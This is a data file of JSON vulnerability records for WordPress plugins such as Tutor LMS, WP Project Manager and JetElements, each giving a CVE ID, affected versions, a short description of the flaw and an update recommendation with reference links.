{"CVE_ID":"CVE-2024-5871","slug":"woo-social-login","versionImpact":"2.6.2","versionEndExcluding":"2.6.3","description":"The WooCommerce - Social Login plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.6.2 via deserialization of untrusted input from the 'woo_slg_verify' vulnerable parameter. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 2.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffd592e6-2ac4-4af4-bfc0-d4f834157d71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffd592e6-2ac4-4af4-bfc0-d4f834157d71?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5868","slug":"woo-social-login","versionImpact":"2.6.2","versionEndExcluding":"2.6.3","description":"The WooCommerce - Social Login plugin for WordPress is vulnerable to Email Verification Bypass in all versions up to, and including, 2.6.2 via the use of an insufficiently random activation code. This makes it possible for unauthenticated attackers to bypass the email verification.","recommendation":"Update to version 2.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97fbbf5b-d3c7-47ce-b251-ce1fe38af152?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/97fbbf5b-d3c7-47ce-b251-ce1fe38af152?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3100","slug":"wedevs-project-manager","versionImpact":"2.6.22","versionEndExcluding":"2.6.23","description":"The WP Project Manager \u2013 Task, team, and project management plugin featuring kanban board and gantt charts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.6.22 due to insufficient input sanitization and output escaping in tasks discussion. This makes it possible for authenticated attackers, with Subscriber-level access and above, and permissions granted by an Administrator, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","recommendation":"Update to version 2.6.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/trunk\\\/src\\\/File\\\/Helper\\\/File.php#L56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/trunk\\\/src\\\/File\\\/Helper\\\/File.php#L56\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268509\\\/wedevs-project-manager\\\/trunk\\\/bootstrap\\\/loaders.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3268509\\\/wedevs-project-manager\\\/trunk\\\/bootstrap\\\/loaders.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d62b087-b0ca-4fa8-921b-5eeb3fa76596?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4d62b087-b0ca-4fa8-921b-5eeb3fa76596?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4370","slug":"brizy","versionImpact":"2.6.20","versionEndExcluding":"2.6.21","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to limited file uploads due to missing authorization on process_external_asset_urls function as well as missing path validation in store_file function in all versions up to, and including, 2.6.20. This makes it possible for unauthenticated attackers to upload .TXT files on the affected site's server.","recommendation":"Update to version 2.6.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/tags\\\/2.6.17\\\/editor\\\/asset\\\/media-processor.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/tags\\\/2.6.17\\\/editor\\\/asset\\\/media-processor.php#L27\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/tags\\\/2.6.17\\\/editor\\\/asset\\\/static-file-trait.php#L44\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/brizy\\\/tags\\\/2.6.17\\\/editor\\\/asset\\\/static-file-trait.php#L44\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db18f6b4-600d-4c63-a9f2-4e3b8ab4fba3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/db18f6b4-600d-4c63-a9f2-4e3b8ab4fba3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7145","slug":"jet-elements","versionImpact":"2.6.20","versionEndExcluding":"2.6.20.1","description":"The JetElements plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.6.20 via the 'progress_type' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 2.6.20.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/793f27ec-a3bb-4273-a41c-cc5b04c8e8fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/793f27ec-a3bb-4273-a41c-cc5b04c8e8fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetelements\\\/\",\"name\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetelements\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7144","slug":"jet-elements","versionImpact":"2.6.20","versionEndExcluding":"2.6.20.1","description":"The JetElements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' and 'slide_id' parameters in all versions up to, and including, 2.6.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.20.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5e64adf-49b3-4e85-8dc1-918f7e92965b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c5e64adf-49b3-4e85-8dc1-918f7e92965b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetelements\\\/\",\"name\":\"https:\\\/\\\/crocoblock.com\\\/plugins\\\/jetelements\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11601","slug":"sky-elementor-addons","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Sky Addons for Elementor (Free Templates Library, Live Copy, Animations, Post Grid, Post Carousel, Particles, Sliders, Chart, Blog, Video Gallery) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.1. This is due to missing or incorrect nonce validation on the save_options() function. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Please note this is limited to option values that can be saved as arrays.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sky-elementor-addons\\\/tags\\\/2.6.1\\\/includes\\\/admin.php#L1267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sky-elementor-addons\\\/tags\\\/2.6.1\\\/includes\\\/admin.php#L1267\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sky-elementor-addons\\\/tags\\\/2.6.1\\\/includes\\\/admin.php#L1290\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sky-elementor-addons\\\/tags\\\/2.6.1\\\/includes\\\/admin.php#L1290\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3189030%40sky-elementor-addons&new=3189030%40sky-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3189030%40sky-elementor-addons&new=3189030%40sky-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b951fd9-0fbf-4576-80a9-dbb053c3da92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5b951fd9-0fbf-4576-80a9-dbb053c3da92?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1751","slug":"tutor","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to time-based SQL Injection via the question_id parameter in all versions up to, and including, 2.6.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber\/student access or higher, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9cee379-79f8-4a60-b1bb-ccab1e954512?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9cee379-79f8-4a60-b1bb-ccab1e954512?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.6.1\\\/classes\\\/Utils.php#L4555\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/tags\\\/2.6.1\\\/classes\\\/Utils.php#L4555\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049105%40tutor&new=3049105%40tutor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049105%40tutor&new=3049105%40tutor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5639","slug":"metronet-profile-picture","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The User Profile Picture plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.6.1 via the 'rest_api_change_profile_image' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to update the profile picture of any user.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01a3b9ba-b18a-48d9-8365-d10f79fc6a6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/01a3b9ba-b18a-48d9-8365-d10f79fc6a6b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metronet-profile-picture\\\/tags\\\/2.6.1\\\/metronet-profile-picture.php#L989\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metronet-profile-picture\\\/tags\\\/2.6.1\\\/metronet-profile-picture.php#L989\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metronet-profile-picture\\\/tags\\\/2.6.1\\\/metronet-profile-picture.php#L1122\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/metronet-profile-picture\\\/tags\\\/2.6.1\\\/metronet-profile-picture.php#L1122\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105132\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105132\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0653","slug":"custom-field-template","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Custom Field Template plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a88330e-fbeb-4ac7-a143-a59766accbeb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9a88330e-fbeb-4ac7-a143-a59766accbeb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0627","slug":"custom-field-template","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Custom Field Template plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's custom field name column in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping on user supplied custom fields. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/637f07c6-68cd-4ac6-83fd-65dbaab882fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/637f07c6-68cd-4ac6-83fd-65dbaab882fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6748","slug":"custom-field-template","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Custom Field Template plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.1 via the 'cft' shortcode. This makes it possible for authenticated attackers with contributor access and above, to extract sensitive data including arbitrary post metadata.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fcd0410-9423-4349-8d1c-3551de38a7c7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7fcd0410-9423-4349-8d1c-3551de38a7c7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6745","slug":"custom-field-template","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Custom Field Template plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'cpt' shortcode in all versions up to, and including, 2.6.1 due to insufficient input sanitization and output escaping on user supplied post meta. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25d07a99-d425-4e1a-8adf-d12071552882?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25d07a99-d425-4e1a-8adf-d12071552882?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3069937%40custom-field-template&new=3069937%40custom-field-template&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1503","slug":"tutor","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.1. This is due to missing or incorrect nonce validation on the erase_tutor_data() function. This makes it possible for unauthenticated attackers to deactivate the plugin and erase all data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This requires the \"Erase upon uninstallation\" option to be enabled.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/050647a8-6743-46e4-b31c-0b5bd4a1007f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/050647a8-6743-46e4-b31c-0b5bd4a1007f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/trunk\\\/classes\\\/Admin.php#L465\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/trunk\\\/classes\\\/Admin.php#L465\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1502","slug":"tutor","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Tutor LMS \u2013 eLearning and online course solution plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the tutor_delete_announcement() function in all versions up to, and including, 2.6.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary posts.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/834c4ca9-7173-4c84-8287-9916ec72935d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/834c4ca9-7173-4c84-8287-9916ec72935d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049105%40tutor&new=3049105%40tutor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3049105%40tutor&new=3049105%40tutor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9542","slug":"sky-elementor-addons","versionImpact":"2.6.1","versionEndExcluding":"2.6.2","description":"The Sky Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.1 via the render function in modules\/content-switcher\/widgets\/content-switcher.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data.","recommendation":"Update to version 2.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189030\\\/sky-elementor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3189030\\\/sky-elementor-addons\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a0d9356-8083-4154-aa04-9008627dd3f5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a0d9356-8083-4154-aa04-9008627dd3f5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12195","slug":"wedevs-project-manager","versionImpact":"2.6.16","versionEndExcluding":"2.6.17","description":"The WP Project Manager \u2013 Task, team, and project management plugin featuring kanban board and gantt charts plugin for WordPress is vulnerable to SQL Injection via the 'project_id' parameter of the \/wp-json\/pm\/v2\/projects\/2\/task-lists REST API endpoint in all versions up to, and including, 2.6.16 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, who have been granted access to a project, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 2.6.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/tags\\\/2.6.14\\\/src\\\/Task_List\\\/Controllers\\\/Task_List_Controller.php#L688\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/tags\\\/2.6.14\\\/src\\\/Task_List\\\/Controllers\\\/Task_List_Controller.php#L688\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3213295\\\/wedevs-project-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3213295\\\/wedevs-project-manager\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/798d120a-edec-4af9-b574-46f9beabc491?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/798d120a-edec-4af9-b574-46f9beabc491?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10548","slug":"wedevs-project-manager","versionImpact":"2.6.15","versionEndExcluding":"2.6.16","description":"The WP Project Manager plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.15 via the Project Task List ('\/wp-json\/pm\/v2\/projects\/1\/task-lists') REST API endpoint. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract sensitive data including the hashed passwords of project owners (e.g. administrators).","recommendation":"Update to version 2.6.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206717\\\/wedevs-project-manager\\\/tags\\\/2.6.16\\\/src\\\/Task_List\\\/Controllers\\\/Task_List_Controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206717\\\/wedevs-project-manager\\\/tags\\\/2.6.16\\\/src\\\/Task_List\\\/Controllers\\\/Task_List_Controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a21b7c40-2090-4262-9105-346db2325612?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a21b7c40-2090-4262-9105-346db2325612?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10520","slug":"wedevs-project-manager","versionImpact":"2.6.14","versionEndExcluding":"2.6.15","description":"The WP Project Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check in the 'check' method of the 'Create_Milestone', 'Create_Task_List', 'Create_Task', and 'Delete_Task' classes in version 2.6.14. This makes it possible for unauthenticated attackers to create milestones, create task lists, create tasks, or delete tasks in any project. NOTE: Version 2.6.14 implemented a partial fix for this vulnerability.","recommendation":"Update to version 2.6.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/497760a8-7d4a-45a0-91e4-a8ee27bcdb02?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/497760a8-7d4a-45a0-91e4-a8ee27bcdb02?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191204\\\/wedevs-project-manager\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191204\\\/wedevs-project-manager\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10174","slug":"wedevs-project-manager","versionImpact":"2.6.13","versionEndExcluding":"2.6.14","description":"The WP Project Manager \u2013 Task, team, and project management plugin featuring kanban board and gantt charts plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.6.13 via the 'Abstract_Permission' class due to missing validation on the 'user_id' user controlled key. This makes it possible for unauthenticated attackers to spoof their identity to that of an administrator and access all of the plugin's REST routes.","recommendation":"Update to version 2.6.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dea2d045-d3b4-4b55-8b4f-5baa82a18834?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dea2d045-d3b4-4b55-8b4f-5baa82a18834?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/trunk\\\/core\\\/Permissions\\\/Abstract_Permission.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wedevs-project-manager\\\/trunk\\\/core\\\/Permissions\\\/Abstract_Permission.php#L32\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3185807\\\/wedevs-project-manager\\\/trunk\\\/core\\\/Permissions\\\/Abstract_Permission.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3185807\\\/wedevs-project-manager\\\/trunk\\\/core\\\/Permissions\\\/Abstract_Permission.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2368","slug":"mollie-forms","versionImpact":"2.6.13","versionEndExcluding":"2.6.14","description":"The Mollie Forms plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.13. This is due to missing or incorrect nonce validation on the duplicateForm() function. This makes it possible for unauthenticated attackers to duplicate forms via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.6.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51ff10f2-4a5b-42ab-9ee2-95b036ac1c9a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/51ff10f2-4a5b-42ab-9ee2-95b036ac1c9a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097426\\\/mollie-forms\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3097426\\\/mollie-forms\",\"refsource\":\"\",\"tags\":[]}]"}
